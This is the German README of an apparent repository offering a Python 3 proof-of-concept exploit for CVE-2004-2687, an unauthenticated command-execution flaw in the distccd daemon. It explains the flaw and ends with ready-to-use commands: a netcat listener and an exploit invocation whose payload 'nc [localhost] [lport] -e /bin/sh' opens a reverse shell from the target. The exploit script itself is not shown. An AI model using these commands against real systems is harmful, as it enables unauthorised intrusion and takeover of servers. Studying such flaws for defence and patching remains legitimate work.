
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Upgrade auf Python3
Übersicht
Diese Repository enthält einen Proof-of-Concept (PoC) Exploit für die als CVE-2004-2687 identifizierte distccd-Sicherheitslücke. Die Schwachstelle existiert im distccd-Daemon, der Teil des verteilten C/C++-Kompilierungssystems distcc ist. Bei falscher Konfiguration ermöglicht distccd Remote-Angreifern, ohne Authentifizierung beliebige Befehle auf dem Server auszuführen.
Schwachstellendetails
distcc wurde entwickelt, um Kompilierungsaufgaben auf mehrere Rechner zu verteilen, um den Build-Prozess zu beschleunigen. Wenn der distccd-Daemon jedoch nicht ordnungsgemäß gesichert ist, setzt er eine Remote-Code-Ausführungs-Sicherheitslücke (RCE) frei. Dies geschieht, weil der Daemon auf einem Netzwerkport lauscht und Befehle von jedem Client akzeptiert, sodass diese Shell-Befehle auf dem Server als der Benutzer, der den Daemon ausführt, ausführen können.
Die Schwachstelle wurde als CVE-2004-2687 eingestuft und betrifft distccd-Versionen vor 3.1. Bei Ausnutzung kann ein Angreifer Shell-Zugriff auf das anfällige System erlangen, was zu einer potenziellen Kompromittierung des gesamten Systems führen kann.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Schwachstelle :

Exploit :
